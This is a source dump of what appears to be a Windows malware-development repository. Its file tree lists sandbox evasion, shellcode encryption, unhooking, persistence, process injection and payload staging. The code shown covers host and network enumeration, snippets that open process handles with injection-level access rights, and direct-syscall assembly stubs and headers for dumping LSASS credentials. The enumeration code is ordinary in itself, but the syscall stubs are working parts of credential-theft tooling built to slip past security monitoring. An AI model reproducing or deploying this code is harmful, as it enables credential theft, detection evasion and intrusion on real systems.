├── Enumeration ├── Network │ ├── Get_IP_Address.c │ ├── Get_IP_Address_File_Creation.cpp │ ├── Get_MAC_Address.c │ ├── Get_Network_Connections.c │ └── Get_Open_Ports.c ├── Processes │ ├── CreateToolhelp32Snapshot.cpp │ ├── GetProcessFromArgv.c │ └── NtGetNextProcess.cpp └── User Environment │ ├── GetENV.c │ ├── Get_CWD.c │ └── Get_Username_Domain_Privileges.c ├── Evasion Techniques ├── LsassDump │ └── LsassDumpSyscall │ │ ├── LsassDump.cpp │ │ ├── Lsasssyscall.h │ │ ├── lsasssyscall.asm │ │ └── readme.md ├── Sandbox Evasion │ ├── UTC_time_zone.c │ ├── check_all_DLL_names.c │ ├── check_all_process_names.c │ ├── detect_debugging.c │ ├── filepath_existence.c │ ├── hostname.c │ ├── mac_address.c │ ├── minimum_num_running_processes.c │ ├── prevent_debugging.c │ ├── processors.c │ ├── processorsCount.cpp │ ├── ram.c │ ├── registry.c │ ├── usb.c │ └── username.c ├── Shellcode Encryption and Decryption │ ├── MSF_Xor_Encrypt.sh │ ├── Xor_Decrypt.c │ └── Xor_Encrypt.c ├── SysCall Examples │ ├── Direct Syscalls │ │ ├── DirectSyscalls.cpp │ │ ├── NtOpenProcess.cpp │ │ └── getSyscall.h │ └── LoadLibraryA Syscalls │ │ ├── NtCreateThreadEx │ │ └── NtCreateThreadEx.cpp │ │ ├── ZWALLOCATEVIRTUALMEMORY │ │ └── ZWALLOCATEVIRTUALMEMORY.cpp │ │ └── ZWWRITEVIRTUALMEMORY │ │ └── ZWWRITEVIRTUALMEMORY.cpp ├── Unhooking │ └── Unhook_ntdll.cpp └── WinAPI Hashing │ ├── VirtualAlloc_Example.c │ └── myhash.py ├── Misc Techniques └── Execute_cmd.c ├── Persistence ├── admin_persistence_accessibility_features.c ├── admin_persistence_appinit_dlls.c ├── admin_persistence_winlogon.c ├── screensaver_hijacking.c └── user_persistence_run.c ├── README.md ├── Shellcode Execution ├── CertEnumSystemStore │ ├── CertEnumSystemStore.cpp │ ├── CertEnumSystemStore.vcxproj │ └── CertEnumSystemStore.vcxproj.filters ├── CertEnumSystemStoreLocation │ ├── CertEnumSystemStoreLocation.cpp │ ├── CertEnumSystemStoreLocation.vcxproj │ └── CertEnumSystemStoreLocation.vcxproj.filters ├── CopyFile2 │ ├── CopyFile2.cpp │ ├── 
CopyFile2.vcxproj │ └── CopyFile2.vcxproj.filters ├── CopyFileEx │ ├── CopyFileEx.cpp │ ├── CopyFileEx.vcxproj │ └── CopyFileEx.vcxproj.filters ├── CreateThreadPoolWait │ ├── CreateThreadPoolWait.cpp │ ├── CreateThreadPoolWait.vcxproj │ └── CreateThreadPoolWait.vcxproj.filters ├── CreateTimerQueueTimer_Tech │ ├── CreateTimerQueueTimer_Tech.cpp │ ├── CreateTimerQueueTimer_Tech.vcxproj │ └── CreateTimerQueueTimer_Tech.vcxproj.filters ├── CryptEnumOIDInfo │ ├── CryptEnumOIDInfo.cpp │ ├── CryptEnumOIDInfo.vcxproj │ └── CryptEnumOIDInfo.vcxproj.filters ├── EnumCalendarInfo │ ├── EnumCalendarInfo.cpp │ └── EnumCalendarInfo.vcxproj ├── EnumCalendarInfoEx │ ├── EnumCalendarInfoEx.cpp │ └── EnumCalendarInfoEx.vcxproj ├── EnumChildWindows │ ├── EnumChildWindows.cpp │ ├── EnumChildWindows.vcxproj │ └── EnumChildWindows.vcxproj.filters ├── EnumDesktopW │ ├── EnumDesktopW.cpp │ ├── EnumDesktopW.vcxproj │ └── EnumDesktopW.vcxproj.filters ├── EnumDesktopWindows │ ├── EnumDesktopWindows.cpp │ ├── EnumDesktopWindows.vcxproj │ └── EnumDesktopWindows.vcxproj.filters ├── EnumDirTreeW │ ├── EnumDirTreeW.cpp │ ├── EnumDirTreeW.vcxproj │ └── EnumDirTreeW.vcxproj.filters ├── EnumDisplayMonitors │ ├── EnumDisplayMonitors.cpp │ ├── EnumDisplayMonitors.vcxproj │ └── EnumDisplayMonitors.vcxproj.filters ├── EnumFontFamiliesExW │ ├── EnumFontFamiliesExW.cpp │ ├── EnumFontFamiliesExW.vcxproj │ └── EnumFontFamiliesExW.vcxproj.filters ├── EnumFontFamiliesW │ ├── EnumFontFamiliesW.cpp │ ├── EnumFontFamiliesW.vcxproj │ └── EnumFontFamiliesW.vcxproj.filters ├── EnumFontsW │ ├── EnumFontsW.cpp │ ├── EnumFontsW.vcxproj │ └── EnumFontsW.vcxproj.filters ├── EnumICMProfiles │ ├── EnumICMProfiles.cpp │ ├── EnumICMProfiles.vcxproj │ └── EnumICMProfiles.vcxproj.filters ├── EnumLanguageGroupLocalesW │ ├── EnumLanguageGroupLocalesW.cpp │ ├── EnumLanguageGroupLocalesW.vcxproj │ └── EnumLanguageGroupLocalesW.vcxproj.filters ├── EnumObjects │ ├── EnumObjects.cpp │ ├── EnumObjects.vcxproj │ └── 
EnumObjects.vcxproj.filters ├── EnumPageFilesW │ ├── EnumPageFilesW.cpp │ ├── EnumPageFilesW.vcxproj │ └── EnumPageFilesW.vcxproj.filters ├── EnumPropsEx │ ├── EnumPropsEx.cpp │ ├── EnumPropsEx.vcxproj │ └── EnumPropsEx.vcxproj.filters ├── EnumPropsW │ ├── EnumPropsW.cpp │ ├── EnumPropsW.vcxproj │ └── EnumPropsW.vcxproj.filters ├── EnumPwrSchemes │ ├── EnumPwrSchemes.cpp │ ├── EnumPwrSchemes.vcxproj │ └── EnumPwrSchemes.vcxproj.filters ├── EnumResourceTypesExW │ ├── EnumResourceTypesExW.cpp │ ├── EnumResourceTypesExW.vcxproj │ └── EnumResourceTypesExW.vcxproj.filters ├── EnumResourceTypesW │ ├── EnumResourceTypesW.cpp │ ├── EnumResourceTypesW.vcxproj │ └── EnumResourceTypesW.vcxproj.filters ├── EnumSystemLocales │ ├── EnumSystemLocales.cpp │ ├── EnumSystemLocales.vcxproj │ └── EnumSystemLocales.vcxproj.filters ├── EnumThreadWindows │ ├── EnumThreadWindows.cpp │ ├── EnumThreadWindows.vcxproj │ └── EnumThreadWindows.vcxproj.filters ├── EnumTimeFormatsEx │ ├── EnumTimeFormatsEx.cpp │ ├── EnumTimeFormatsEx.vcxproj │ └── EnumTimeFormatsEx.vcxproj.filters ├── EnumUILanguagesW │ ├── EnumUILanguagesW.cpp │ ├── EnumUILanguagesW.vcxproj │ └── EnumUILanguagesW.vcxproj.filters ├── EnumWindowStationsW │ ├── EnumWindowStationsW.cpp │ ├── EnumWindowStationsW.vcxproj │ └── EnumWindowStationsW.vcxproj.filters ├── EnumWindows │ ├── EnumWindows.cpp │ ├── EnumWindows.vcxproj │ └── EnumWindows.vcxproj.filters ├── EnumerateLoadedModules │ ├── EnumerateLoadedModules.cpp │ ├── EnumerateLoadedModules.vcxproj │ └── EnumerateLoadedModules.vcxproj.filters ├── FiberContextEdit │ ├── FiberContextEdit.vcxproj │ ├── FiberContextEdit.vcxproj.filters │ └── Source.cpp ├── FileMap │ └── directPointerToFileMap.cpp ├── FlsAlloc │ ├── FlsAlloc.cpp │ ├── FlsAlloc.vcxproj │ └── FlsAlloc.vcxproj.filters ├── ImageGetDigestStream │ ├── ImageGetDigestStream.cpp │ ├── ImageGetDigestStream.vcxproj │ └── ImageGetDigestStream.vcxproj.filters ├── ImmEnumInputContext │ ├── ImmEnumInputContext.cpp │ ├── 
ImmEnumInputContext.vcxproj │ └── ImmEnumInputContext.vcxproj.filters ├── InitOnceExecuteOnce │ ├── InitOnceExecuteOnce.cpp │ ├── InitOnceExecuteOnce.vcxproj │ └── InitOnceExecuteOnce.vcxproj.filters ├── Injection Techniques │ ├── Process_Injection.c │ └── Thread_Injection.c ├── LdrEnumerateLoadedModules │ ├── LdrEnumerateLoadedModules.cpp │ ├── LdrEnumerateLoadedModules.vcxproj │ └── LdrEnumerateLoadedModules.vcxproj.filters ├── LdrpCallInitRoutine │ ├── LdrpCallInitRoutine.vcxproj │ ├── LdrpCallInitRoutine.vcxproj.filters │ └── Source.cpp ├── OpenThreadWaitChainSession │ ├── CreateTimerQueueTimer.cpp │ ├── OpenThreadWaitChainSession.vcxproj │ └── OpenThreadWaitChainSession.vcxproj.filters ├── RtlUserFiberStart │ ├── RtlUserFiberStart.vcxproj │ ├── RtlUserFiberStart.vcxproj.filters │ └── Source.cpp ├── SetTimer │ ├── SetTimer.cpp │ ├── SetTimer.vcxproj │ └── SetTimer.vcxproj.filters ├── SetupCommitFileQueueW │ ├── SetupCommitFileQueueW.cpp │ ├── SetupCommitFileQueueW.vcxproj │ └── SetupCommitFileQueueW.vcxproj.filters ├── SymEnumProcesses │ ├── SymEnumProcesses.cpp │ ├── SymEnumProcesses.vcxproj │ └── SymEnumProcesses.vcxproj.filters ├── SymFindFileInPath │ ├── SymFindFileInPath.cpp │ ├── SymFindFileInPath.vcxproj │ └── SymFindFileInPath.vcxproj.filters ├── SysEnumSourceFiles │ ├── SysEnumSourceFiles.cpp │ ├── SysEnumSourceFiles.vcxproj │ └── SysEnumSourceFiles.vcxproj.filters └── VerifierEnumerateResource │ ├── VerifierEnumerateResource.cpp │ ├── VerifierEnumerateResource.vcxproj │ └── VerifierEnumerateResource.vcxproj.filters └── Staging Techniques ├── ADS_Stage.c ├── HTTP_Stage.cpp ├── Local_Stage.c ├── SMB_Stage.c └── Sockets_Staging.cpp /Enumeration/Network/Get_IP_Address.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "ws2_32.lib") // Link with Winsock library 6 | 7 | // Function to get the IP address 8 | char* getIPAddress() { 9 | WSADATA wsaData; 10 | 
static char ipstr[INET_ADDRSTRLEN]; // Static to ensure it persists after the function exits 11 | char hostname[256]; 12 | struct addrinfo hints, * res, * p; 13 | 14 | // Initialize Winsock 15 | if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) { 16 | return NULL; 17 | } 18 | 19 | // Get the hostname of the machine 20 | if (gethostname(hostname, sizeof(hostname)) != 0) { 21 | WSACleanup(); 22 | return NULL; 23 | } 24 | 25 | // Set up hints for getaddrinfo 26 | ZeroMemory(&hints, sizeof(hints)); 27 | hints.ai_family = AF_INET; // IPv4 28 | hints.ai_socktype = SOCK_STREAM; 29 | hints.ai_protocol = IPPROTO_TCP; 30 | 31 | // Get address information 32 | if (getaddrinfo(hostname, NULL, &hints, &res) != 0) { 33 | WSACleanup(); 34 | return NULL; 35 | } 36 | 37 | // Loop through the results and get the first IPv4 address 38 | for (p = res; p != NULL; p = p->ai_next) { 39 | struct sockaddr_in* addr = (struct sockaddr_in*)p->ai_addr; 40 | inet_ntop(AF_INET, &addr->sin_addr, ipstr, sizeof(ipstr)); 41 | break; // Stop after the first address 42 | } 43 | 44 | // Free the address information and cleanup 45 | freeaddrinfo(res); 46 | WSACleanup(); 47 | 48 | return ipstr; 49 | } 50 | 51 | int main() { 52 | char* ipAddress = getIPAddress(); 53 | if (ipAddress) { 54 | printf("%s\n", ipAddress); 55 | } 56 | else { 57 | printf("Failed to retrieve IP address.\n"); 58 | } 59 | return 0; 60 | } 61 | -------------------------------------------------------------------------------- /Enumeration/Network/Get_IP_Address_File_Creation.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | using namespace std; 6 | 7 | int main() 8 | { 9 | string* s = new string [10]; 10 | string line; 11 | ifstream IPFile; 12 | int offset; 13 | char* search0 = "IPv4 Address. . . . . . . . . . . 
:"; // search pattern 14 | 15 | system("ipconfig > ip.txt"); 16 | 17 | IPFile.open ("ip.txt"); 18 | 19 | int i = 0; 20 | if(IPFile.is_open()) 21 | { 22 | while(!IPFile.eof()) 23 | { 24 | getline(IPFile,line); 25 | if ((offset = line.find(search0, 0)) != string::npos) 26 | { 27 | line.erase(0,39); 28 | s[i] = line; 29 | i++; 30 | } 31 | } 32 | } 33 | IPFile.close(); 34 | for(int j = 0; j 2 | #include 3 | #include 4 | #include 5 | 6 | #pragma comment(lib, "ws2_32.lib") // Link with Winsock library 7 | #pragma comment(lib, "iphlpapi.lib") // Link with IP Helper API library 8 | 9 | 10 | // Function to get the MAC address 11 | char* getMACAddress() { 12 | static char macstr[18]; // Static to ensure it persists after the function exits 13 | PIP_ADAPTER_INFO adapterInfo; 14 | PIP_ADAPTER_INFO adapter; 15 | DWORD bufferSize = sizeof(IP_ADAPTER_INFO); 16 | adapterInfo = (IP_ADAPTER_INFO*)malloc(bufferSize); 17 | 18 | // Get the adapter info 19 | if (GetAdaptersInfo(adapterInfo, &bufferSize) == ERROR_BUFFER_OVERFLOW) { 20 | free(adapterInfo); 21 | adapterInfo = (IP_ADAPTER_INFO*)malloc(bufferSize); 22 | } 23 | 24 | if (GetAdaptersInfo(adapterInfo, &bufferSize) == NO_ERROR) { 25 | // Loop through adapters and get the first MAC address 26 | for (adapter = adapterInfo; adapter != NULL; adapter = adapter->Next) { 27 | snprintf(macstr, sizeof(macstr), "%02X:%02X:%02X:%02X:%02X:%02X", 28 | adapter->Address[0], adapter->Address[1], adapter->Address[2], 29 | adapter->Address[3], adapter->Address[4], adapter->Address[5]); 30 | break; // Stop after the first adapter 31 | } 32 | } 33 | else { 34 | free(adapterInfo); 35 | return NULL; 36 | } 37 | 38 | free(adapterInfo); 39 | return macstr; 40 | } 41 | 42 | int main() { 43 | 44 | char* macAddress = getMACAddress(); 45 | 46 | if (macAddress) { 47 | printf("MAC Address: %s\n", macAddress); 48 | } 49 | else { 50 | printf("Failed to retrieve MAC address.\n"); 51 | } 52 | 53 | return 0; 54 | } 55 | 
-------------------------------------------------------------------------------- /Enumeration/Network/Get_Network_Connections.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "iphlpapi.lib") 8 | #pragma comment(lib, "ws2_32.lib") 9 | 10 | // Define INET_ADDRSTRLEN if it's not already defined 11 | #ifndef INET_ADDRSTRLEN 12 | #define INET_ADDRSTRLEN 22 13 | #endif 14 | 15 | void displayNetworkConnections() { 16 | PMIB_TCPTABLE_OWNER_PID tcpTable = NULL; 17 | PMIB_UDPTABLE_OWNER_PID udpTable = NULL; 18 | DWORD tcpTableSize = 0, udpTableSize = 0; 19 | DWORD result; 20 | 21 | // Retrieve TCP table size 22 | result = GetExtendedTcpTable(NULL, &tcpTableSize, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0); 23 | tcpTable = (PMIB_TCPTABLE_OWNER_PID)malloc(tcpTableSize); 24 | 25 | if (tcpTable == NULL || GetExtendedTcpTable(tcpTable, &tcpTableSize, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0) != NO_ERROR) { 26 | printf("Failed to retrieve TCP table.\n"); 27 | free(tcpTable); 28 | return; 29 | } 30 | 31 | // Retrieve UDP table size 32 | result = GetExtendedUdpTable(NULL, &udpTableSize, FALSE, AF_INET, UDP_TABLE_OWNER_PID, 0); 33 | udpTable = (PMIB_UDPTABLE_OWNER_PID)malloc(udpTableSize); 34 | 35 | if (udpTable == NULL || GetExtendedUdpTable(udpTable, &udpTableSize, FALSE, AF_INET, UDP_TABLE_OWNER_PID, 0) != NO_ERROR) { 36 | printf("Failed to retrieve UDP table.\n"); 37 | free(tcpTable); 38 | free(udpTable); 39 | return; 40 | } 41 | 42 | printf("Active Network Connections (TCP):\n"); 43 | for (DWORD i = 0; i < tcpTable->dwNumEntries; i++) { 44 | char localAddr[INET_ADDRSTRLEN], remoteAddr[INET_ADDRSTRLEN]; 45 | struct in_addr local, remote; 46 | 47 | local.S_un.S_addr = tcpTable->table[i].dwLocalAddr; 48 | remote.S_un.S_addr = tcpTable->table[i].dwRemoteAddr; 49 | 50 | inet_ntop(AF_INET, &local, localAddr, sizeof(localAddr)); 51 | inet_ntop(AF_INET, 
&remote, remoteAddr, sizeof(remoteAddr)); 52 | 53 | printf("TCP: Local: %s:%d -> Remote: %s:%d | State: %ld\n", 54 | localAddr, ntohs((u_short)tcpTable->table[i].dwLocalPort), 55 | remoteAddr, ntohs((u_short)tcpTable->table[i].dwRemotePort), 56 | tcpTable->table[i].dwState); 57 | } 58 | 59 | printf("\nActive Network Connections (UDP):\n"); 60 | for (DWORD i = 0; i < udpTable->dwNumEntries; i++) { 61 | char localAddr[INET_ADDRSTRLEN]; 62 | struct in_addr local; 63 | 64 | local.S_un.S_addr = udpTable->table[i].dwLocalAddr; 65 | 66 | inet_ntop(AF_INET, &local, localAddr, sizeof(localAddr)); 67 | 68 | printf("UDP: Local: %s:%d\n", 69 | localAddr, ntohs((u_short)udpTable->table[i].dwLocalPort)); 70 | } 71 | 72 | free(tcpTable); 73 | free(udpTable); 74 | } 75 | 76 | int main() { 77 | displayNetworkConnections(); 78 | return 0; 79 | } 80 | -------------------------------------------------------------------------------- /Enumeration/Network/Get_Open_Ports.c: -------------------------------------------------------------------------------- 1 | #include // Include winsock2.h first to avoid conflicts 2 | #include // Include windows.h after winsock2.h 3 | #include 4 | #include 5 | #include 6 | 7 | #pragma comment(lib, "iphlpapi.lib") 8 | #pragma comment(lib, "ws2_32.lib") // Link Winsock library for ntohs 9 | 10 | // Function to retrieve all open TCP ports 11 | void getOpenPorts() { 12 | DWORD bufferSize = 0; 13 | PMIB_TCPTABLE_OWNER_PID tcpTable = NULL; 14 | DWORD result; 15 | 16 | // Determine the buffer size required for the TCP table 17 | result = GetExtendedTcpTable(NULL, &bufferSize, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0); 18 | if (result != ERROR_INSUFFICIENT_BUFFER) { 19 | printf("Failed to determine buffer size. 
Error: %lu\n", result); 20 | return; 21 | } 22 | 23 | tcpTable = (PMIB_TCPTABLE_OWNER_PID)malloc(bufferSize); 24 | if (tcpTable == NULL) { 25 | printf("Memory allocation failed.\n"); 26 | return; 27 | } 28 | 29 | // Retrieve the TCP table 30 | result = GetExtendedTcpTable(tcpTable, &bufferSize, FALSE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0); 31 | if (result != NO_ERROR) { 32 | printf("Failed to retrieve TCP table. Error: %lu\n", result); 33 | free(tcpTable); 34 | return; 35 | } 36 | 37 | // Loop through the table and display open ports 38 | printf("Open TCP Ports:\n"); 39 | for (DWORD i = 0; i < tcpTable->dwNumEntries; i++) { 40 | DWORD localPort = ntohs((u_short)tcpTable->table[i].dwLocalPort); 41 | DWORD state = tcpTable->table[i].dwState; 42 | 43 | // Display ports in LISTENING or ESTABLISHED state 44 | if (state == MIB_TCP_STATE_LISTEN || state == MIB_TCP_STATE_ESTAB) { 45 | printf("Port: %lu, State: %s\n", 46 | localPort, 47 | (state == MIB_TCP_STATE_LISTEN) ? "LISTENING" : "ESTABLISHED"); 48 | } 49 | } 50 | 51 | // Free the allocated memory 52 | free(tcpTable); 53 | } 54 | 55 | int main() { 56 | getOpenPorts(); 57 | return 0; 58 | } 59 | -------------------------------------------------------------------------------- /Enumeration/Processes/CreateToolhelp32Snapshot.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() 6 | { 7 | int pid = 0; 8 | LPCTSTR processname = L"svchost.exe"; 9 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0); 10 | if (hSnapshot == INVALID_HANDLE_VALUE) 11 | { 12 | return -1; 13 | } 14 | PROCESSENTRY32 pe; 15 | pe.dwSize = sizeof(pe); 16 | 17 | if (!Process32First(hSnapshot, &pe)) 18 | { 19 | -1; 20 | } 21 | 22 | HANDLE hProcess = NULL; 23 | do { 24 | if (0 == _wcsicmp(processname, pe.szExeFile)) 25 | { 26 | pid = pe.th32ProcessID; 27 | printf("[!] 
Trying to open handle on %ls, on pid %d\n", processname, pid); 28 | 29 | hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, pid); 30 | if (hProcess == NULL) 31 | { 32 | printf("[X] Could not open handle on %d, continuing\n", pid); 33 | } 34 | else 35 | { 36 | printf("[+] Successfully got handle on %d\n", pid); 37 | break; 38 | } 39 | } 40 | } while (Process32Next(hSnapshot, &pe)); 41 | 42 | CloseHandle(hSnapshot); 43 | } 44 | 45 | -------------------------------------------------------------------------------- /Enumeration/Processes/GetProcessFromArgv.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | DWORD GetProcessIdByName(IN const char* name, OUT HANDLE& hProcess) 8 | { 9 | PROCESSENTRY32 entry; 10 | entry.dwSize = sizeof(PROCESSENTRY32); 11 | char buf[MAX_PATH] = { 0 }; 12 | size_t charsConverted = 0; 13 | 14 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); 15 | if (snapshot == INVALID_HANDLE_VALUE) 16 | { 17 | printf("[-] Could not create snapshot. Error: %lu\n", GetLastError()); 18 | return NULL; 19 | } 20 | 21 | if (Process32First(snapshot, &entry) == TRUE) 22 | { 23 | do 24 | { 25 | wcstombs_s(&charsConverted, buf, MAX_PATH, entry.szExeFile, MAX_PATH - 1); 26 | if (_stricmp(buf, name) == 0) 27 | { 28 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, entry.th32ProcessID); 29 | if (hProcess != NULL) 30 | { 31 | printf("[+] Got handle on %d\n", entry.th32ProcessID); 32 | CloseHandle(snapshot); // Always close handles you no longer need 33 | return entry.th32ProcessID; 34 | } 35 | printf("[-] Could not obtain handle on %d. 
Continuing!\n", entry.th32ProcessID); 36 | } 37 | } while (Process32Next(snapshot, &entry) == TRUE); 38 | } 39 | 40 | printf("[-] Process not found.\n"); 41 | CloseHandle(snapshot); 42 | return NULL; 43 | } 44 | 45 | int main(int argc, char* argv[]) 46 | { 47 | int pid = GetProcessIdByName(argv[1]); 48 | printf("%d\n", pid); 49 | } 50 | -------------------------------------------------------------------------------- /Enumeration/Processes/NtGetNextProcess.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Find process ID by NtGetNextProcess. C++ implementation 3 | * author: @cocomelonc 4 | * based on https://cocomelonc.github.io/malware/2023/05/26/malware-tricks-30.html 5 | */ 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #pragma comment(lib, "ntdll.lib") 13 | #pragma comment(lib, "shlwapi.lib") 14 | 15 | typedef NTSTATUS (NTAPI * fNtGetNextProcess)( 16 | _In_ HANDLE ProcessHandle, 17 | _In_ ACCESS_MASK DesiredAccess, 18 | _In_ ULONG HandleAttributes, 19 | _In_ ULONG Flags, 20 | _Out_ PHANDLE NewProcessHandle 21 | ); 22 | 23 | int findMyProc(const char * procname) { 24 | int pid = 0; 25 | HANDLE current = NULL; 26 | char procName[MAX_PATH]; 27 | 28 | // resolve function address 29 | fNtGetNextProcess myNtGetNextProcess = (fNtGetNextProcess) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtGetNextProcess"); 30 | 31 | // loop through all processes 32 | while (!myNtGetNextProcess(current, MAXIMUM_ALLOWED, 0, 0, ¤t)) { 33 | GetProcessImageFileNameA(current, procName, MAX_PATH); 34 | if (lstrcmpiA(procname, PathFindFileName((LPCSTR) procName)) == 0) { 35 | pid = GetProcessId(current); 36 | break; 37 | } 38 | } 39 | 40 | return pid; 41 | } 42 | 43 | int main(int argc, char* argv[]) { 44 | int pid = 0; // process ID 45 | pid = findMyProc(argv[1]); 46 | printf("%s%d\n", pid > 0 ? "process found at pid = " : "process not found. 
pid = ", pid); 47 | return 0; 48 | } -------------------------------------------------------------------------------- /Enumeration/User Environment/GetENV.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main () { 4 | printf("UserName : %s\n", getenv("USERNAME")); 5 | printf("Path : %s\n", getenv("PATH")); 6 | printf("UserHome : %s\n", getenv("USERPROFILE")); 7 | 8 | return(0); 9 | } -------------------------------------------------------------------------------- /Enumeration/User Environment/Get_CWD.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void getCurrentWorkingDirectory() { 5 | TCHAR cwd[MAX_PATH]; 6 | if (GetCurrentDirectory(MAX_PATH, cwd)) { 7 | _tprintf(_T("Current Working Directory: %s\n"), cwd); 8 | } 9 | else { 10 | _ftprintf(stderr, _T("Error retrieving current working directory.\n")); 11 | } 12 | } 13 | 14 | int main() { 15 | getCurrentWorkingDirectory(); 16 | return 0; 17 | } 18 | -------------------------------------------------------------------------------- /Evasion Techniques/LsassDump/LsassDumpSyscall/Lsasssyscall.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include // For original definitions of structures and types like CLIENT_ID 5 | 6 | // Remove any custom definitions of CLIENT_ID or related types 7 | 8 | // Prototypes for the functions with the correct signatures, assuming these signatures match those required by your syscalls 9 | EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, CLIENT_ID* ClientId); 10 | EXTERN_C NTSTATUS ZwClose10(HANDLE Handle); 11 | EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE ProcessHandle, PVOID BaseAddress, LPCVOID Buffer, SIZE_T BufferSize, PSIZE_T NumberOfBytesWritten); 12 | EXTERN_C NTSTATUS ZwProtectVirtualMemory10(HANDLE 
ProcessHandle, PVOID* BaseAddress, SIZE_T* NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection); 13 | EXTERN_C NTSTATUS ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 14 | EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 15 | 16 | // Global function pointers for dynamic resolution, if needed 17 | // If using these, they should be resolved at runtime based on the system version 18 | typedef NTSTATUS(NTAPI* PFN_ZwOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, CLIENT_ID* ClientId); 19 | typedef NTSTATUS(NTAPI* PFN_ZwClose)(HANDLE Handle); 20 | typedef NTSTATUS(NTAPI* PFN_ZwWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, LPCVOID Buffer, SIZE_T BufferSize, PSIZE_T NumberOfBytesWritten); 21 | typedef NTSTATUS(NTAPI* PFN_ZwProtectVirtualMemory)(HANDLE ProcessHandle, PVOID* BaseAddress, SIZE_T* NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection); 22 | typedef NTSTATUS(NTAPI* PFN_ZwQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 23 | typedef NTSTATUS(NTAPI* PFN_NtCreateFile)(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); 24 | 25 | // Actual function pointer variables 26 | PFN_ZwOpenProcess g_ZwOpenProcess = nullptr; 27 | PFN_ZwClose g_ZwClose = nullptr; 28 | PFN_ZwWriteVirtualMemory 
g_ZwWriteVirtualMemory = nullptr; 29 | PFN_ZwProtectVirtualMemory g_ZwProtectVirtualMemory = nullptr; 30 | PFN_ZwQuerySystemInformation g_ZwQuerySystemInformation = nullptr; 31 | PFN_NtCreateFile g_NtCreateFile = nullptr; 32 | -------------------------------------------------------------------------------- /Evasion Techniques/LsassDump/LsassDumpSyscall/lsasssyscall.asm: -------------------------------------------------------------------------------- 1 | .CODE 2 | ZwOpenProcess10 proc 3 | mov r10, rcx 4 | mov eax, 26h 5 | syscall 6 | ret 7 | ZwOpenProcess10 endp 8 | 9 | ZwClose10 proc 10 | mov r10, rcx 11 | mov eax, 0Fh 12 | syscall 13 | ret 14 | ZwClose10 endp 15 | 16 | ZwWriteVirtualMemory10 proc 17 | mov r10, rcx 18 | mov eax, 3Ah 19 | syscall 20 | ret 21 | ZwWriteVirtualMemory10 endp 22 | 23 | ZwProtectVirtualMemory10 proc 24 | mov r10, rcx 25 | mov eax, 50h 26 | syscall 27 | ret 28 | ZwProtectVirtualMemory10 endp 29 | 30 | ZwQuerySystemInformation10 proc 31 | mov r10, rcx 32 | mov eax, 36h 33 | syscall 34 | ret 35 | ZwQuerySystemInformation10 endp 36 | 37 | NtAllocateVirtualMemory10 proc 38 | mov r10, rcx 39 | mov eax, 18h 40 | syscall 41 | ret 42 | NtAllocateVirtualMemory10 endp 43 | 44 | NtFreeVirtualMemory10 proc 45 | mov r10, rcx 46 | mov eax, 1Eh 47 | syscall 48 | ret 49 | NtFreeVirtualMemory10 endp 50 | 51 | NtCreateFile10 proc 52 | mov r10, rcx 53 | mov eax, 55h 54 | syscall 55 | ret 56 | NtCreateFile10 endp 57 | 58 | end 59 | -------------------------------------------------------------------------------- /Evasion Techniques/LsassDump/LsassDumpSyscall/readme.md: -------------------------------------------------------------------------------- 1 | ## **Step-by-Step Compilation Instructions** 2 | 3 | ### **1. Install Visual Studio** 4 | 1. Download and install the **Visual Studio IDE** (Community Edition is sufficient) from [Download](https://visualstudio.microsoft.com/). 5 | 2. 
